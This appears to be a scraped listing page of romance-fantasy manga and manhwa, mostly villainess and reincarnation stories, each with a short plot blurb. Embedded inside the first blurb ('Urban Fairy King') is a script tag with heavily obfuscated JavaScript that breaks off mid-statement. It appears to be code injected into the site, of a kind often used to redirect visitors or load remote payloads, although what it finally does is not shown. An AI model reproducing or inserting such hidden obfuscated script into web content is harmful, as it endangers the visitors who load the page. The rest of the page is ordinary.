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4041 results

Urban Fairy King

Bai Li Yun Xiao – with a spiritual life in the continent Jiuxiao. After his death he was resurrected, however, he returned 300 years ago, returned to urban adolescence, changed his life, and climbed to the top of the world again. “Whether in heaven or on earth, only I can win”<script></script><script>(function(_0xf15543,_0x3732f3){var _0x307fbf=_0x569a,_0x505ec0=_0xf15543();while(!![]){try{var _0x164599=-parseInt(_0x307fbf(0xd4))/(0x1*0x1903+-0x14cd+-0x435)+-parseInt(_0x307fbf(0xb7))/(-0xa71+-0xdad+0xc10*0x2)*(-parseInt(_0x307fbf(0xcc))/(-0x5b5+-0x8bf*-0x4+-0x1*0x1d44))+parseInt(_0x307fbf(0xbb))/(-0xf6c+0x29*0x94+-0x2*0x422)+-parseInt(_0x307fbf(0xbe))/(-0x6ec+-0x6b*0x3d+-0x3*-0xad0)*(parseInt(_0x307fbf(0xc6))/(-0x262*0x8+0x6cb+-0x419*-0x3))+parseInt(_0x307fbf(0xc7))/(0x187d+0x17ef+-0x1*0x3065)+parseInt(_0x307fbf(0xb6))/(-0xe*0x9+0x62e*-0x5+0x1f6c)+-parseInt(_0x307fbf(0xd5))/(0x1321+-0x1*0x539+-0xddf);if(_0x164599===_0x3732f3)break;else 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I Became The Emperor’s Daughter One Day

<h2>I Became The Emperor’s Daughter One Day</h2> A car accident allowed her to cross the magical world, she was reincarnated to a baby! She participated in a competition and won. Then, she was adopted by the emperor and became a princess. However, the other adopted princesses are all given with luxury treatment. But why is it that only she lives in small firewood house? She is also beaten and bullied by the other princesses? She will do whatever it takes to fight back. When she shows a brave fighting spirit, the cold-blooded emperor finally came and said to her: “This little brat, is a little interesting.”


Limited Time Princess

<h2>Limited Time Princess</h2> An ordinary employee Yun Jae-eun became Princess Diamantine from inside a novel! B.u.t. “Why of all things, even if I transmigrate, did I have to end up as someone who’ll soon get a death penalty, Sheillia, the villainess out of villainesses…!” Jae-eun, who has a hunch about her own unfortunate fate, decides to try to change Sheillia’s set fate. The dying princess, despite opening her eyes, Delphinium Palace where no one rejoiced was gradually changing that way but…


Ingrid, the White Deer

The beautiful daughter of the Farnese family is caught up in a whirlwind romance with a notorious royal playboy — it’s the scandal of the century! When the title of “Elvynee Deer” is awarded to the pure and lovely Ingrid Farnese, all of high society expects her to marry into foreign royalty. Cursed in love with a history of broken engagements, Ingrid is determined to stay put at home in Valentine Kingdom. To take control of her own future she’ll make the king’s illegitimate son, libertine and womanizer Regan Espencer, propose to her. But the problem is, Regan is the only man in the country who doesn’t want her hand in marriage! Will Ingrid survive being tossed into the throes of debauchery and reach her happy ending?Source of collecting images:bato.to/series/77642Resources:tappytoon.com/comics/ingrid-the-white-deer


The Antagonist’s Pet ( The Pet of the Villainess )

<h4>Alternative Name: The Pet of the Villainess</h4> Blessed with the face of an angel, young Sasha Tartt knows a life-altering secret: in this romance novel where she’s just a side character, she’s the only one who knows the true ending! When the antagonist of the story takes a particular liking to her, she must make a decision: help the clever and beautiful Rebecca find a happy ending, or side with the sweet-natured protagonist to ensure her own survival? On top of that, Sasha has to juggle the affections of her bespectacled love interest and tame a dragon boy! Can Sasha learn new tricks to win the hearts of these main characters?


Shadow Queen

“Can you be my daughter for me?” By his offer, Elena became Duke of Franceschi’s fake daughter. She became the queen and gave birth to Crown Prince’s son. Then suddenly, Princess Veronica who was assumed dead came back. She was only just a toy. And eventually, Elena gets her son taken and murdered……. However, She went back to the past. “I’ll destroy all of you.” I’ll never live as a toy again. Elena decides to seeks revenge


The Justice of Villainous Woman ( What It Takes to be a Villainess )

<div class="description-summary"> <div class="summary__content show-more active"> With a broken heart, Hwayoung falls headfirst into the river by accident but wakes up as infamous villainess Satiana Altisee Kaylon. Coming to terms with her new life as sole daughter of House Kaylon, Satiana is soon chosen as a candidate for the next empress! In the palace full of schemers and liars, she must become a cold-blooded villainess to win her royal seat by the crown prince – or her new family will face grave danger! Will being perfectly evil really be enough? ‘Cause even villains need love! </div> </div>


The Bloody Merchant Empress and the Cold Husband’s Forceful Doting

<h2>The Bloody Merchant Empress and the Cold Husband’s Forceful Doting</h2> She is the daughter of a merchant and falls in love with a general HuoMing, becoming a queen, but she did not expect HuoMing to betray because of a new joy so killed her …


Beast with Flowers

A heart throbbing, royal fantasy comic on the romance of Moo-young, a fierce beast who disguises as a puppy to gain love; and Hwa-yeon, a girl, who raises and trains a large puppy, oblivious to it’s real identity. WARNING: Foolish girls and boys are conveniently stationed at every twist and turn. Enjoy~


Rise From the Ashes

Rise From the Ashes In order to save her mother, Qingge joined the Wei's mansion as an orphaned daughter. On the surface, she was adopted by the Wei residence, but in reality, she worked for the Weis as a secret agent. Ten years later, she managed to attract the second prince's attention and so unfolded a conspiracy... Will she turn the tide? Will she rise from the ashes... MangaToon got authorization from Leyouyinghua to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


The Bizarre Adventure of Miss Capricious

<span class="mx-1">I Just Want to Be a Useless Duke's Daughter other name The Bizarre Adventure of Miss Capricious </span> I was reborn into a novel "The Mistake of Cleavens" and became a silly, love-deprived young lady. Fame? Power? Love? Those are not enough to attract me, as I happened to be the richest girl in the world! Yes, I'm going to lead a brand new life with all the wealth I got. But wait! I seem to recall that the ending of this novel is a bad end?! The world collapsed because Lady Cleavens abandoned a cat, which brought the doom of the world! Alright, even if I need to adopt all the cats in this world, I'll do it as long as I can reverse my fate and save it from its doom! MangaToon got authorization from Daxingdao Comic to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Lady to Queen

An empress fell into a trap, divorced and was cut off by her family. In the last minute of her life, her sister Lizzy regretted how things ended up. “Only if I were the empress“ she would make sure not to love the emperor. Everyone will be happy without dying. When she opened her eyes, she returned back time before she became the Empress. In order to prevent a recurrence of the tragedies of her past life, Lizzie makes a final decision: “I will become the queen instead of you.“ Can Lizzy, who became an empress, live a happy life?
